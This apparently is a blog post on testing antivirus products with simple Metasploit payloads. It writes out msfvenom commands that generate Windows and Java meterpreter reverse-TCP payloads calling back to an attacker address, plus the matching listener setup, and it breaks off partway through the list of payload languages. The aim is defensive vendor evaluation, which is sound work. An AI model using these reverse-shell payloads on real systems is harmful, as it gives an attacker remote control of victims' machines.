Testing AVs With Simple Vectors
Having had the need to run some tests against prospective AV vendors, I have performed some simple tests using Metasploit payloads and Mimikatz. In this post, I will go over the techniques used and how to employ them.
To kick off I generated a basic executable meterpreter with simple encoding and no encryption.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.1.1.2 LPORT=4444 -o meterpreter.exe -f exe --encoder x64/xor_dynamic --platform windows --arch x64
The options used are:
-p the payload to use.
LHOST & LPORT – these are the Metasploit options which are set in msf using “set OPTION value”. In this case, the attacking host and attacking port because all payloads used are reverse TCP payloads (the victim host connecting back to the attacking machine as opposed to the attacking machine connecting to the victim).-o the output file.
-f the format to use. Use raw when generating script payloads (or the language name e.g. python) to get the native code. There are options to transform payloads but I will not be covering this.
-p the target platform. Generally not needed for scripting languages like Python.
–arch the target platform architecture. Generally not needed for scripting languages like Python.
Within Metasploit, I kicked off the listener. This will be common to all generated payloads so I will not be repeating it. Just note that the payload and port will need to change depending on what is generated with msfvenom.
use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 0.0.0.0
SET LPORT 4444
As expected this was detected without issue, no surprise there.
I generated a few more payloads using various languages. A lot of these can be shimmed into the environment without requiring an install making them viable vectors.
Java – detected – Requires JVM or JSK. Execute with java – jar file.jar
msfvenom -f raw -p payload/java/meterpreter/reverse_tcp LHOST=10.1.1.2 LPORT=4443 -o payload.jar
